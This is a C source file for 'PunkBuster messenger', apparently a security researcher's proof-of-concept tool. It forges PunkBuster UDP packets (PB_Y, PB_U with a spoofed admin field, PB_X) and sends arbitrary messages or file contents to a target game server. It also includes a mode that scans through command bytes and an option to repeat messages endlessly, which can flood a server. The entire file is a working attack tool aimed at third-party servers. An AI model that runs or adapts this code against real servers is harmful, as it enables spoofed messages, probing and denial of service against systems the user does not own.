/*
    Copyright 2007 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include <sys/stat.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close       closesocket
    #define sleep       Sleep
    #define ONESEC      1000
    #define sleepms(x)  sleep(x)
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC      1
    #define stristr     strcasestr
    #define sleepms(x)  usleep(x * 1000)
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define BUFFSZ      0xffff



int mm(u8 *dst, u8 *src, int len);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    struct  stat    xstat;
    FILE    *fd;
    int     i,
            sd,
            len,
            msglen,
            attack  = 1,
            ms      = -1;
    u16     port;
    u8      *host,
            *msg,
            *buff,
            *p,
            c       = 0xff,
            *valids = "2IMRSUY";

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "PunkBuster messenger "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 4) {
        printf("\n"
            "Usage: %s [options] <host> <port> <message/file>\n"
            "\n"
            "Options:\n"
            "-u     use PB_U command (default is PB_Y)\n"
            "-x     commands scanner, use all the valid PB commands which produce an output\n"
            "       works only with the -l option, the message is placed at offset 8\n"
            "-z     as above but tries any command from '0' to 'Z'\n"
            "-l MS  infinite messages each MS milliseconds (default, one message only)\n"
            "\n"
            "* message can be a text message like \"hello I'm a message\" or the name of a\n"
            "  local file containing the data you want to send\n"
            "\n", argv[0]);
        exit(1);
    }

    argc -= 3;
    for(i = 1; i < argc; i++) {
        if(((argv[i][0] != '-') && (argv[i][0] != '/')) || (strlen(argv[i]) != 2)) {
            printf("\nError: wrong argument (%s)\n", argv[i]);
            exit(1);
        }
        switch(argv[i][1]) {
            case 'u': attack = 2;               break;
            case 'x': attack = 3;               break;
            case 'z': attack = 4;               break;
            case 'l': ms     = atoi(argv[++i]); break;
            default: {
                printf("\nError: wrong argument (%s)\n", argv[i]);
                exit(1);
            }
        }
    }

    host = argv[argc];
    port = atoi(argv[argc + 1]);
    msg  = argv[argc + 2];

    fd = fopen(msg, "rb");
    if(fd) {
        printf("- load file %s\n", msg);
        fstat(fileno(fd), &xstat);
        msglen = xstat.st_size;
        msg = malloc(msglen);
        if(!msg) std_err();
        fread(msg, 1, msglen, fd);
        fclose(fd);
    } else {
        msglen = strlen(msg);
    }

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    p = buff;
    if(attack == 1) {
        p += mm(p, "\xff\xff\xff\xff" "PB_Y", 8);
    } else if(attack == 2) {
        p += mm(p,
            "\xff\xff\xff\xff" "PB_U"
            "\xff\xff\xff\xff"
            "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0",
            32);
        p += sprintf(p, "%s:%hu;admin;", "127.0.0.1", 33333);
    } else {
        if(ms < 0) {
            printf("\nError: you must set -l MS for using this option\n");
            exit(1);
        }
        p += mm(p, "\xff\xff\xff\xff" "PB_X", 8);
    }
    len = p - buff;
    if((len + msglen) > BUFFSZ) msglen = BUFFSZ - len;
    p += mm(p, msg, msglen);
    len = p - buff;

    printf("- packet size %u bytes\n", len);

    for(;;) {
        if(attack > 2) {
            for(;;) {
                if(c > 'Z') c = '0';
                if(attack == 4) break;
                if(strchr(valids, c)) break;
                c++;
            }
            buff[7] = c;
            c++;
        }

        if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(struct sockaddr_in))
          < 0) std_err();
        fputc('.', stdout);

        if(ms < 0) break;
        sleepms(ms);
    }

    close(sd);
    free(buff);
    printf("\n- done\n");
    return(0);
}



int mm(u8 *dst, u8 *src, int len) {
    memcpy(dst, src, len);
    return(len);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


